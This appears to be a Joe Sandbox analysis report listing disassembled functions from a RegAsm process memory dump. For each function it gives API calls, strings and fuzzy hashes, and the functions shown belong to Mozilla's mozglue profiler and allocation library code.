Function 6C2E4AD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C2E4AB7,?,6C2A43CF,?,6C2A42D2), ref: 6C2E4B48
free.MOZGLUE(?,?,?,80000000,?,6C2E4AB7,?,6C2A43CF,?,6C2A42D2), ref: 6C2E4B7F
memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C2E4AB7,?,6C2A43CF,?,6C2A42D2), ref: 6C2E4B94
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C2E4AB7,?,6C2A43CF,?,6C2A42D2), ref: 6C2E4BBC
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6C2E4AB7,?,6C2A43CF,?,6C2A42D2), ref: 6C2E4BEE

Strings

pid:, xrefs: 6C2E4BE8

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
String ID: pid:
API String ID: 1916652239-3403741246
Opcode ID: f0006ea2de73d890eae75815d0dc475d9938cf475c669d6bfe050ad88ea4227a
Instruction ID: 093cf1c02617c2357552e05c468019283c8ee6bed830d46340fe8ffb72beb9ac
Opcode Fuzzy Hash: f0006ea2de73d890eae75815d0dc475d9938cf475c669d6bfe050ad88ea4227a
Instruction Fuzzy Hash: CC410871B002599BCB14DEB8EC8099FB7B9AF49224B54463CFC59E7781D630D90887A1

Function 6C2F1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2F1D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C2F1BE3,?,?,6C2F1D96,00000000), ref: 6C2F1D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C2F1BE3,?,?,6C2F1D96,00000000), ref: 6C2F1D4C
GetCurrentThreadId.KERNEL32 ref: 6C2F1DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2F1DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2F1DDA

Part of subcall function 6C2F1EF0: GetCurrentThreadId.KERNEL32 ref: 6C2F1F03
Part of subcall function 6C2F1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C2F1DF2,00000000,00000000), ref: 6C2F1F0C
Part of subcall function 6C2F1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C2F1F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C2F1DF4

Part of subcall function 6C2BCA10: malloc.MOZGLUE(?), ref: 6C2BCA26

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 9a8c58d2f9de00bd21d6ecc472c57a903680363008208fdf7e7d0dc224ec23ff
Instruction ID: 192b56bd6bf1382c92d7e69e4117e32887677955ebe0ad69b620f8d7bb101899
Opcode Fuzzy Hash: 9a8c58d2f9de00bd21d6ecc472c57a903680363008208fdf7e7d0dc224ec23ff
Instruction Fuzzy Hash: 66418AB92007099FCB14DF28C589A56BBF9FF49318F50442DE95A87B41CB35F854CBA1

Function 6C2ED210 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C2B5820,?), ref: 6C2ED21F
moz_xmalloc.MOZGLUE(00000001,?,?,6C2B5820,?), ref: 6C2ED22E

Part of subcall function 6C2BCA10: malloc.MOZGLUE(?), ref: 6C2BCA26

memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,6C2B5820,?), ref: 6C2ED242
free.MOZGLUE(00000000,?,?,?,?,?,?,6C2B5820,?), ref: 6C2ED253

Part of subcall function 6C2C5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C2C5EDB
Part of subcall function 6C2C5E90: memset.VCRUNTIME140(ew0l,000000E5,?), ref: 6C2C5F27
Part of subcall function 6C2C5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C2C5FB2

memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,6C2B5820,?), ref: 6C2ED280

Strings

X+l, xrefs: 6C2ED23C, 6C2ED29E, 6C2ED2E3

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
String ID: X+l
API String ID: 2029485308-3517833008
Opcode ID: 734ea47fc7161273efb8a6a21dd7d28ec010bff90fc09e785d14dc6bbde7e92c
Instruction ID: 9bb643df4b58adc0d25afd8ef2907637b27b371e41da138ba5bfc06138abe175
Opcode Fuzzy Hash: 734ea47fc7161273efb8a6a21dd7d28ec010bff90fc09e785d14dc6bbde7e92c
Instruction Fuzzy Hash: 5A31B57590025A9FCB00CF58C880AAEBB75AFCD748F644569DD547B702D372E806CBE1

Function 6C2B38A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C32E220,?,?,?,?,6C2B3899,?), ref: 6C2B38B2
ReleaseSRWLockExclusive.KERNEL32(6C32E220,?,?,?,6C2B3899,?), ref: 6C2B38C3
free.MOZGLUE(00000000,?,?,?,6C2B3899,?), ref: 6C2B38F1
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C2B3920
RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C2B3899,?), ref: 6C2B392F
RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C2B3899,?), ref: 6C2B3943
RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6C2B396E

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: 9be4b3d5d32ccd738efe8266214b72dff4cfd6d8013fcafe7712715235757dd0
Instruction ID: 86244c00624bf6a6b02fd9253119a7043e0eafb1e8ed4343ca150b6c2542a5d0
Opcode Fuzzy Hash: 9be4b3d5d32ccd738efe8266214b72dff4cfd6d8013fcafe7712715235757dd0
Instruction Fuzzy Hash: 1821D172600A68DFD720DF15C880B86B7A9FF45368F258429ED5AA7B10CB35F845CBD1

Function 6C2E84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2E84F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2E850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2E851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2E855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2E856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2E85AC

Part of subcall function 6C2E7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C2E85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2E767F
Part of subcall function 6C2E7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C2E85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2E7693
Part of subcall function 6C2E7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C2E85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2E76A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2E85B2

Part of subcall function 6C2C5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C2C5EDB
Part of subcall function 6C2C5E90: memset.VCRUNTIME140(ew0l,000000E5,?), ref: 6C2C5F27
Part of subcall function 6C2C5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C2C5FB2

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 4d4afc60b0f2558fddb913fe12f51432a20f7b00018c95cac43755adbe4fe628
Instruction ID: 06d4f55be20fa4a8fc7f538a4dd5243733ca703df895062fd1d1398bc4dc20e9
Opcode Fuzzy Hash: 4d4afc60b0f2558fddb913fe12f51432a20f7b00018c95cac43755adbe4fe628
Instruction Fuzzy Hash: 3E21D3702006058FEF14DB28D888A9AB7B9AF4830DF55482DE99BD3B41DB35F948CB91

Function 6C2B1640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6C2B1699
VerSetConditionMask.NTDLL ref: 6C2B16CB
VerSetConditionMask.NTDLL ref: 6C2B16D7
VerSetConditionMask.NTDLL ref: 6C2B16DE
VerSetConditionMask.NTDLL ref: 6C2B16E5
VerSetConditionMask.NTDLL ref: 6C2B16EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C2B16F9

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: 9a4fb8be3ef614171f1cdd1eeb653e85d7c1fd9595ba0cba973707d667c65aa7
Instruction ID: eecd6b46189327d4621720662783042f74e637558fbc5d2d0b78bd1c78f64d88
Opcode Fuzzy Hash: 9a4fb8be3ef614171f1cdd1eeb653e85d7c1fd9595ba0cba973707d667c65aa7
Instruction Fuzzy Hash: 2F21A5B07403086FEB116A688C46FFB737CDF86758F04452CFA459B580C678DD548BA1

Function 6C2FD1D0 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2FD1EC
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2FD1F5

Part of subcall function 6C2FAD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6C2FAE20

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2FD211
GetCurrentThreadId.KERNEL32 ref: 6C2FD217
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2FD226
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2FD279
free.MOZGLUE(?), ref: 6C2FD2B2

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
String ID:
API String ID: 3049780610-0
Opcode ID: f0aa475e56ca0ec01570cb1824f8d5c3711925acd1c5f1a2a3d634558c887c30
Instruction ID: c0b8d95495003dfb3f59ce695a0ead11f1a0055d26ab5cfc38cde65fca99753b
Opcode Fuzzy Hash: f0aa475e56ca0ec01570cb1824f8d5c3711925acd1c5f1a2a3d634558c887c30
Instruction Fuzzy Hash: 9D216275604309DFCB04DF24C498ADEB7B5FF8A329F10452DE9268B341DB35A90ACB96

Function 6C2EF5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2DCBE8: GetCurrentProcess.KERNEL32(?,6C2A31A7), ref: 6C2DCBF1
Part of subcall function 6C2DCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C2A31A7), ref: 6C2DCBFA

Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C2B4A68), ref: 6C2E945E
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2E9470
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2E9482
Part of subcall function 6C2E9420: __Init_thread_footer.LIBCMT ref: 6C2E949F

GetCurrentThreadId.KERNEL32 ref: 6C2EF619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C2EF598), ref: 6C2EF621

Part of subcall function 6C2E94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2E94EE
Part of subcall function 6C2E94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2E9508

GetCurrentThreadId.KERNEL32 ref: 6C2EF637
AcquireSRWLockExclusive.KERNEL32(6C32F4B8,?,?,00000000,?,6C2EF598), ref: 6C2EF645
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8,?,?,00000000,?,6C2EF598), ref: 6C2EF663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C2EF62A

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: 35d4648fcfe86f87165c7b407cd0c0ddef12de1da40367e639cf52822a6b8223
Instruction ID: 6a4ae3be7f631f326da07c7649ab5c07c71b5fdd3f551aebe415cc7fa9633320
Opcode Fuzzy Hash: 35d4648fcfe86f87165c7b407cd0c0ddef12de1da40367e639cf52822a6b8223
Instruction Fuzzy Hash: C411E775201209ABCF00AF18E944DD6B77DFF8A76DB900019EE1697F41CB79A821CBA0

Function 6C2B2070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2DAB89: EnterCriticalSection.KERNEL32(6C32E370,?,?,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284), ref: 6C2DAB94
Part of subcall function 6C2DAB89: LeaveCriticalSection.KERNEL32(6C32E370,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284,?,?,6C2C56F6), ref: 6C2DABD1

LoadLibraryW.KERNEL32(combase.dll,6C2B1C5F), ref: 6C2B20AE
GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C2B20CD
__Init_thread_footer.LIBCMT ref: 6C2B20E1
FreeLibrary.KERNEL32 ref: 6C2B2124

Strings

combase.dll, xrefs: 6C2B20A9
CoInitializeSecurity, xrefs: 6C2B20C7

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeSecurity$combase.dll
API String ID: 4190559335-2476802802
Opcode ID: 13273f213517ea944ec6739722851cc3906e5a09c21c133c0cbd3c896059831a
Instruction ID: 0836eae44e15d1b175128b5f163d984ab08191b54cde47c8f9ed516aadb3950b
Opcode Fuzzy Hash: 13273f213517ea944ec6739722851cc3906e5a09c21c133c0cbd3c896059831a
Instruction Fuzzy Hash: B8213D75200219EFDF119F55DD48D9A3B79FB4E35AF204018FE0592610D7399861DF50

Function 6C3076C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6C3076F2
moz_xmalloc.MOZGLUE(00000001), ref: 6C307705

Part of subcall function 6C2BCA10: malloc.MOZGLUE(?), ref: 6C2BCA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C307717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C30778F,00000000,00000000,00000000,00000000), ref: 6C307731
free.MOZGLUE(00000000), ref: 6C307760

Strings

}>.l, xrefs: 6C3076C4

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID: }>.l
API String ID: 2538299546-3655814040
Opcode ID: f1b6a68512b6dc388dfa3cc54cfcb82998587df236dc715c5234b442d4e10381
Instruction ID: 2818c40f1a693ef8098832aa70eaf516ff8949096bfaa14f770a3022d5498ef1
Opcode Fuzzy Hash: f1b6a68512b6dc388dfa3cc54cfcb82998587df236dc715c5234b442d4e10381
Instruction Fuzzy Hash: 4511B6B2A052156BDB10AF759C44BBB7EFCEF46794F044529F888A7700E77188408BF2

Function 6C2E99A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C2B4A68), ref: 6C2E945E
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2E9470
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2E9482
Part of subcall function 6C2E9420: __Init_thread_footer.LIBCMT ref: 6C2E949F

GetCurrentThreadId.KERNEL32 ref: 6C2E99C1
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2E99CE
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2E99F8
GetCurrentThreadId.KERNEL32 ref: 6C2E9A05
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2E9A0D

Part of subcall function 6C2E9A60: GetCurrentThreadId.KERNEL32 ref: 6C2E9A95
Part of subcall function 6C2E9A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2E9A9D
Part of subcall function 6C2E9A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C2E9ACC
Part of subcall function 6C2E9A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2E9BA7
Part of subcall function 6C2E9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C2E9BB8
Part of subcall function 6C2E9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C2E9BC9

Part of subcall function 6C2DCBE8: GetCurrentProcess.KERNEL32(?,6C2A31A7), ref: 6C2DCBF1
Part of subcall function 6C2DCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C2A31A7), ref: 6C2DCBFA

Strings

[I %d/%d] profiler_stream_json_for_this_process, xrefs: 6C2E9A15

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
String ID: [I %d/%d] profiler_stream_json_for_this_process
API String ID: 2359002670-141131661
Opcode ID: 3b7a56d2fe1520ebafe2d79e3e95d5c176c824093e98e3d03698f5628577cc78
Instruction ID: 5c2498667bb36fb1e7179fc8d87da6b39f79fb91c0c84e89ac78a0d33f911b85
Opcode Fuzzy Hash: 3b7a56d2fe1520ebafe2d79e3e95d5c176c824093e98e3d03698f5628577cc78
Instruction Fuzzy Hash: D401ED76A041399BDF006F25A808AE93B7CEF4A229F45011BFD0A67B01C7BC4824CAA1

Function 6C2B1FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2DAB89: EnterCriticalSection.KERNEL32(6C32E370,?,?,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284), ref: 6C2DAB94
Part of subcall function 6C2DAB89: LeaveCriticalSection.KERNEL32(6C32E370,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284,?,?,6C2C56F6), ref: 6C2DABD1

LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C2B1FDE
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C2B1FFD
__Init_thread_footer.LIBCMT ref: 6C2B2011
FreeLibrary.KERNEL32 ref: 6C2B2059

Strings

combase.dll, xrefs: 6C2B1FD9
CoCreateInstance, xrefs: 6C2B1FF7

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoCreateInstance$combase.dll
API String ID: 4190559335-2197658831
Opcode ID: a57c8240747f4d66d525151fc452d4d5cdebb1c5b65adb90c08faedcbeaf93ae
Instruction ID: 4c43931e9a58248203d04279b09a1c5077baace870aa2ae5c4d7151a0befc074
Opcode Fuzzy Hash: a57c8240747f4d66d525151fc452d4d5cdebb1c5b65adb90c08faedcbeaf93ae
Instruction Fuzzy Hash: 86117CB5201719AFEF20CF26C948E963B7DEB5A39AF20442DFD0596640CB399841CF61

Function 6C2B0EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2DAB89: EnterCriticalSection.KERNEL32(6C32E370,?,?,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284), ref: 6C2DAB94
Part of subcall function 6C2DAB89: LeaveCriticalSection.KERNEL32(6C32E370,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284,?,?,6C2C56F6), ref: 6C2DABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C2DD9F0,00000000), ref: 6C2B0F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C2B0F3C
__Init_thread_footer.LIBCMT ref: 6C2B0F50
FreeLibrary.KERNEL32(?,6C2DD9F0,00000000), ref: 6C2B0F86

Strings

CoInitializeEx, xrefs: 6C2B0F36
combase.dll, xrefs: 6C2B0F18

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
